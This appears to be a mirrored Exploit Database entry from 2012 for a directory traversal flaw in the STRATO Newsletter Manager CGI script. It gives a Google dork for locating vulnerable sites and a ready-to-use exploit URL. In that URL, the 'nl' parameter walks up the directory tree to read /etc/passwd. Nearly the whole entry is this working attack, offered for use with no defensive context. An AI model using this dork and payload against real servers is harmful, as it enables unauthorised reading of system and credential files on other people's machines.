STRATO NewsLetter Manager – Directory Traversal

• Exploit Database
• 30 阅读

• 作者： Zero X
  日期： 2012-05-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18815/

• STRATO Newsletter Manager is vulnerable against Directory Traversal
  
  Vendor: www.strato-cgi.de
  
  Google Dork: inurl:"newsletter.php.cgi"
  
  
  Exploit:
  
  http://server/cgi-bin/newsletter.php.cgi?PHPSESSID=af92ed633ae0d06d1e24d22520f709f7&action=nl_show&nl=../../../../../../../../../../../../../../etc/passwd
  
  Greetz Zero X